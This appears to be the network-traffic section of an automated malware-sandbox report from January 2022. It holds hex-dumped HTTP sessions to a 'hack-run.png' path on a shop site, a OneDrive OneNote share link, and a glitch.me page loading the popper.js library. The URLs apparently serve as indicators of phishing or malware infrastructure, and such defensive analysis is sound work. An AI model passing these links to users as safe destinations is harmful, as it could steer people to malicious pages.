2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Timestamp	kBytes transferred	Direction	Data
Jan 28, 2022 17:24:59.771435976 CET	24046	OUT	GET /images/sampledata/hack-run.png HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36 Host: shopget24.com
Jan 28, 2022 17:24:59.951499939 CET	24047	IN	HTTP/1.1 301 Moved Permanently keep-alive: timeout=5, max=100 content-type: text/html content-length: 707 date: Fri, 28 Jan 2022 16:24:59 GMT server: LiteSpeed location: https://shopget24.com/images/sampledata/hack-run.png x-turbo-charged-by: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Timestamp	kBytes transferred	Direction	Data
2022-01-28 16:24:24 UTC	0	OUT	POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1 Host: accounts.google.com Connection: keep-alive Content-Length: 1 Origin: https://www.google.com Content-Type: application/x-www-form-urlencoded Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2022-01-28 16:24:24 UTC	0	OUT	Data Raw: 20 Data Ascii:
2022-01-28 16:24:24 UTC	1	IN	HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 Access-Control-Allow-Origin: https://www.google.com Access-Control-Allow-Credentials: true X-Content-Type-Options: nosniff Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 28 Jan 2022 16:24:24 GMT Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin; report-to="IdentityListAccountsHttp" Report-To: {"group":"IdentityListAccountsHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/IdentityListAccountsHttp/external"}]} Content-Security-Policy: script-src 'report-sample' 'nonce-ilUzQYqzhA4++OhXyntidQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'nonce-ilUzQYqzhA4++OhXyntidQ' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport Server: ESF X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding Connection: close Transfer-Encoding: chunked
2022-01-28 16:24:24 UTC	2	IN	Data Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a Data Ascii: 11["gaia.l.a.r",[]]
2022-01-28 16:24:24 UTC	3	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	kBytes transferred	Direction	Data
2022-01-28 16:24:24 UTC	0	OUT	GET /o/s!BHKIhV1bB5BYgmk0Y3amEiFjpOkm?e=4jMd_F12EUOBJkiyUyiEYw&at=9 HTTP/1.1 Host: 1drv.ms Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2022-01-28 16:24:24 UTC	1	IN	HTTP/1.1 301 Moved Permanently Location: https://onedrive.live.com/redir?resid=5890075B5D858872!361&authkey=!AjRjdqYSIWOk6SY&ithint=onenote&e=4jMd_F12EUOBJkiyUyiEYw&at=9 X-MSNSERVER: DB3PPF326010AB7 Strict-Transport-Security: max-age=31536000; includeSubDomains MS-CV: b5YhQpqF4E6+IgtU1GBWnw.0 X-AsmVersion: UNKNOWN; 19.830.111.2003 X-Cache: CONFIG_NOCACHE X-MSEdge-Ref: Ref A: F9EC71A813B04C4E906F8E5A7CF68E3E Ref B: FRAEDGE1107 Ref C: 2022-01-28T16:24:24Z Date: Fri, 28 Jan 2022 16:24:24 GMT Connection: close Content-Length: 0

Timestamp	kBytes transferred	Direction	Data
2022-01-28 16:24:57 UTC	1059	OUT	GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1 Host: cdnjs.cloudflare.com Connection: keep-alive Origin: https://magenta-flicker-surprise.glitch.me User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: script Referer: https://magenta-flicker-surprise.glitch.me/freedo.html Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2022-01-28 16:24:57 UTC	1059	IN	HTTP/1.1 200 OK Date: Fri, 28 Jan 2022 16:24:57 GMT Content-Type: application/javascript; charset=utf-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=30672000 ETag: W/"5eb03fa9-4af4" Last-Modified: Mon, 04 May 2020 16:15:37 GMT cf-cdnjs-via: cfworker/kv Cross-Origin-Resource-Policy: cross-origin Timing-Allow-Origin: * X-Content-Type-Options: nosniff Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" CF-Cache-Status: HIT Age: 137298 Expires: Wed, 18 Jan 2023 16:24:57 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mVnxFXwgROBkitomSgj6l82hbYQPR1Ljxumka6xmL21HWP%2FuEg0OZI7z3Ea%2FK0NtVtBEMfiwJHoCnqTEE2dlDIGWSkykjJU%2FBJzjDRPvG4S5bU%2B0KVTCZCGl3iRg58jO9n9adDxX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=15780000 Server: cloudflare CF-RAY: 6d4b92ee48519137-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
2022-01-28 16:24:57 UTC	1060	IN	Data Raw: 34 61 66 34 0d 0a 2f 2a 0a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 46 65 64 65 72 69 63 6f 20 5a 69 76 6f 6c 6f 20 32 30 31 37 0a 20 44 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 28 6c 69 63 65 6e 73 65 20 74 65 72 6d 73 20 61 72 65 20 61 74 20 68 74 74 70 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4d 49 54 29 2e 0a 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 27 6f 62 6a 65 63 74 27 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 27 75 6e 64 65 66 69 6e 65 64 27 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 27 66 75 6e 63 74 69 6f 6e 27 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 Data Ascii: 4af4/* Copyright (C) Federico Zivolo 2017 Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT). */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&
2022-01-28 16:24:57 UTC	1061	IN	Data Raw: 3d 74 28 29 7d 29 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 27 75 73 65 20 73 74 72 69 63 74 27 3b 66 75 6e 63 74 69 6f 6e 20 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 27 5b 6f 62 6a 65 63 74 20 46 75 6e 63 74 69 6f 6e 5d 27 3d 3d 3d 7b 7d 2e 74 6f 53 74 72 69 6e 67 2e 63 61 6c 6c 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 2c 74 29 7b 69 66 28 31 21 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e 5b 5d 3b 76 61 72 20 6f 3d 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 2c 6e 75 6c 6c 29 3b 72 65 74 75 72 6e 20 74 3f 6f 5b 74 5d 3a 6f 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 72 65 74 75 72 6e 27 48 54 4d 4c 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 3f 65 3a 65 2e 70 61 72 65 6e 74 4e 6f 64 65 7c 7c 65 2e 68 6f 73 74 7d Data Ascii: =t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode\|\|e.host}
2022-01-28 16:24:57 UTC	1062	IN	Data Raw: 4d 4c 27 3d 3d 3d 69 29 7b 76 61 72 20 6e 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 72 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 73 63 72 6f 6c 6c 69 6e 67 45 6c 65 6d 65 6e 74 7c 7c 6e 3b 72 65 74 75 72 6e 20 72 5b 6f 5d 7d 72 65 74 75 72 6e 20 65 5b 6f 5d 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 65 2c 74 29 7b 76 61 72 20 6f 3d 32 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 2c 69 3d 61 28 74 2c 27 74 6f 70 27 29 2c 6e 3d 61 28 74 2c 27 6c 65 66 74 27 29 2c 72 3d 6f 3f 2d 31 3a 31 3b 72 65 74 75 72 6e 20 65 2e 74 6f 70 2b 3d 69 2a 72 2c 65 2e 62 6f 74 74 6f 6d 2b 3d 69 2a 72 2c Data Ascii: ML'===i){var n=e.ownerDocument.documentElement,r=e.ownerDocument.scrollingElement\|\|n;return r[o]}return e[o]}function l(e,t){var o=2<arguments.length&&void 0!==arguments[2]&&arguments[2],i=a(t,'top'),n=a(t,'left'),r=o?-1:1;return e.top+=ir,e.bottom+=ir,
2022-01-28 16:24:57 UTC	1063	IN	Data Raw: 27 48 54 4d 4c 27 3d 3d 3d 6f 2e 6e 6f 64 65 4e 61 6d 65 2c 70 3d 67 28 65 29 2c 73 3d 67 28 6f 29 2c 64 3d 6e 28 65 29 2c 61 3d 74 28 6f 29 2c 66 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 62 6f 72 64 65 72 54 6f 70 57 69 64 74 68 2c 31 30 29 2c 6d 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 62 6f 72 64 65 72 4c 65 66 74 57 69 64 74 68 2c 31 30 29 2c 68 3d 63 28 7b 74 6f 70 3a 70 2e 74 6f 70 2d 73 2e 74 6f 70 2d 66 2c 6c 65 66 74 3a 70 2e 6c 65 66 74 2d 73 2e 6c 65 66 74 2d 6d 2c 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 29 3b 69 66 28 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 30 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 30 2c 21 69 26 26 72 29 7b 76 61 72 20 75 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72 67 Data Ascii: 'HTML'===o.nodeName,p=g(e),s=g(o),d=n(e),a=t(o),f=parseFloat(a.borderTopWidth,10),m=parseFloat(a.borderLeftWidth,10),h=c({top:p.top-s.top-f,left:p.left-s.left-m,width:p.width,height:p.height});if(h.marginTop=0,h.marginLeft=0,!i&&r){var u=parseFloat(a.marg
2022-01-28 16:24:57 UTC	1065	IN	Data Raw: 28 2d 31 3d 3d 3d 65 2e 69 6e 64 65 78 4f 66 28 27 61 75 74 6f 27 29 29 72 65 74 75 72 6e 20 65 3b 76 61 72 20 70 3d 79 28 6f 2c 69 2c 72 2c 6e 29 2c 73 3d 7b 74 6f 70 3a 7b 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 74 2e 74 6f 70 2d 70 2e 74 6f 70 7d 2c 72 69 67 68 74 3a 7b 77 69 64 74 68 3a 70 2e 72 69 67 68 74 2d 74 2e 72 69 67 68 74 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 2c 62 6f 74 74 6f 6d 3a 7b 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 62 6f 74 74 6f 6d 2d 74 2e 62 6f 74 74 6f 6d 7d 2c 6c 65 66 74 3a 7b 77 69 64 74 68 3a 74 2e 6c 65 66 74 2d 70 2e 6c 65 66 74 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 7d 2c 64 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 73 29 2e 6d 61 70 28 66 75 6e 63 Data Ascii: (-1===e.indexOf('auto'))return e;var p=y(o,i,r,n),s={top:{width:p.width,height:t.top-p.top},right:{width:p.right-t.right,height:p.height},bottom:{width:p.width,height:p.bottom-t.bottom},left:{width:t.left-p.left,height:p.height}},d=Object.keys(s).map(func
2022-01-28 16:24:57 UTC	1066	IN	Data Raw: 2e 69 6e 64 65 78 4f 66 28 69 29 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 6f 2c 69 29 7b 76 61 72 20 6e 3d 76 6f 69 64 20 30 3d 3d 3d 69 3f 74 3a 74 2e 73 6c 69 63 65 28 30 2c 44 28 74 2c 27 6e 61 6d 65 27 2c 69 29 29 3b 72 65 74 75 72 6e 20 6e 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 5b 27 66 75 6e 63 74 69 6f 6e 27 5d 26 26 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 27 60 6d 6f 64 69 66 69 65 72 2e 66 75 6e 63 74 69 6f 6e 60 20 69 73 20 64 65 70 72 65 63 61 74 65 64 2c 20 75 73 65 20 60 6d 6f 64 69 66 69 65 72 2e 66 6e 60 21 27 29 3b 76 61 72 20 69 3d 74 5b 27 66 75 6e 63 74 69 6f 6e 27 5d 7c 7c 74 2e 66 6e 3b 74 2e 65 6e 61 62 6c 65 64 26 26 65 28 69 29 26 26 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 3d 63 28 6f 2e 6f 66 Data Ascii: .indexOf(i)}function C(t,o,i){var n=void 0===i?t:t.slice(0,D(t,'name',i));return n.forEach(function(t){t['function']&&console.warn('`modifier.function` is deprecated, use `modifier.fn`!');var i=t['function']\|\|t.fn;t.enabled&&e(i)&&(o.offsets.popper=c(o.of
2022-01-28 16:24:57 UTC	1067	IN	Data Raw: 74 68 69 73 2e 70 6f 70 70 65 72 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 27 2c 74 68 69 73 2e 70 6f 70 70 65 72 2e 73 74 79 6c 65 2e 74 6f 70 3d 27 27 2c 74 68 69 73 2e 70 6f 70 70 65 72 2e 73 74 79 6c 65 5b 57 28 27 74 72 61 6e 73 66 6f 72 6d 27 29 5d 3d 27 27 29 2c 74 68 69 73 2e 64 69 73 61 62 6c 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 28 29 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 6d 6f 76 65 4f 6e 44 65 73 74 72 6f 79 26 26 74 68 69 73 2e 70 6f 70 70 65 72 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 68 69 73 2e 70 6f 70 70 65 72 29 2c 74 68 69 73 7d 66 75 6e 63 74 69 6f 6e 20 42 28 65 29 7b 76 61 72 20 74 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3b 72 65 74 75 72 6e 20 74 3f 74 2e 64 65 66 Data Ascii: this.popper.style.position='',this.popper.style.top='',this.popper.style[W('transform')]=''),this.disableEventListeners(),this.options.removeOnDestroy&&this.popper.parentNode.removeChild(this.popper),this}function B(e){var t=e.ownerDocument;return t?t.def
2022-01-28 16:24:57 UTC	1069	IN	Data Raw: 28 6f 29 7b 76 61 72 20 69 3d 74 5b 6f 5d 3b 21 31 3d 3d 3d 69 3f 65 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 6f 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 6f 2c 74 5b 6f 5d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 2c 74 2c 6f 29 7b 76 61 72 20 69 3d 54 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6f 3d 65 2e 6e 61 6d 65 3b 72 65 74 75 72 6e 20 6f 3d 3d 3d 74 7d 29 2c 6e 3d 21 21 69 26 26 65 2e 73 6f 6d 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 6e 61 6d 65 3d 3d 3d 6f 26 26 65 2e 65 6e 61 62 6c 65 64 26 26 65 2e 6f 72 64 65 72 3c 69 2e 6f 72 64 65 72 7d 29 3b 69 66 28 21 6e 29 7b 76 61 72 20 72 3d 27 60 27 2b 74 2b 27 60 27 3b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 27 60 27 2b 6f 2b 27 60 27 Data Ascii: (o){var i=t[o];!1===i?e.removeAttribute(o):e.setAttribute(o,t[o])})}function F(e,t,o){var i=T(e,function(e){var o=e.name;return o===t}),n=!!i&&e.some(function(e){return e.name===o&&e.enabled&&e.order<i.order});if(!n){var r='`'+t+'`';console.warn('`'+o+'`'
2022-01-28 16:24:57 UTC	1070	IN	Data Raw: 6f 6e 63 61 74 28 70 2e 73 6c 69 63 65 28 73 2b 31 29 29 5d 3b 72 65 74 75 72 6e 20 61 3d 61 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 2c 69 29 7b 76 61 72 20 6e 3d 28 31 3d 3d 3d 69 3f 21 72 3a 72 29 3f 27 68 65 69 67 68 74 27 3a 27 77 69 64 74 68 27 2c 70 3d 21 31 3b 72 65 74 75 72 6e 20 65 2e 72 65 64 75 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 27 27 3d 3d 3d 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 26 26 2d 31 21 3d 3d 5b 27 2b 27 2c 27 2d 27 5d 2e 69 6e 64 65 78 4f 66 28 74 29 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 3d 74 2c 70 3d 21 30 2c 65 29 3a 70 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 2b 3d 74 2c 70 3d 21 31 2c 65 29 3a 65 2e 63 6f 6e 63 61 74 28 74 29 7d 2c 5b 5d 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e Data Ascii: oncat(p.slice(s+1))];return a=a.map(function(e,i){var n=(1===i?!r:r)?'height':'width',p=!1;return e.reduce(function(e,t){return''===e[e.length-1]&&-1!==['+','-'].indexOf(t)?(e[e.length-1]=t,p=!0,e):p?(e[e.length-1]+=t,p=!1,e):e.concat(t)},[]).map(function
2022-01-28 16:24:57 UTC	1071	IN	Data Raw: 3d 6f 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 6f 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 27 76 61 6c 75 65 27 69 6e 20 6f 26 26 28 6f 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 6f 2e 6b 65 79 2c 6f 29 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 2c 6f 2c 69 29 7b 72 65 74 75 72 6e 20 6f 26 26 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 6f 29 2c 69 26 26 65 28 74 2c 69 29 2c 74 7d 7d 28 29 2c 70 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 72 65 74 75 72 6e 20 74 20 69 6e 20 65 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 6f 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 Data Ascii: =o.enumerable\|\|!1,o.configurable=!0,'value'in o&&(o.writable=!0),Object.defineProperty(e,o.key,o)}return function(t,o,i){return o&&e(t.prototype,o),i&&e(t,i),t}}(),pe=function(e,t,o){return t in e?Object.defineProperty(e,t,{value:o,enumerable:!0,configura
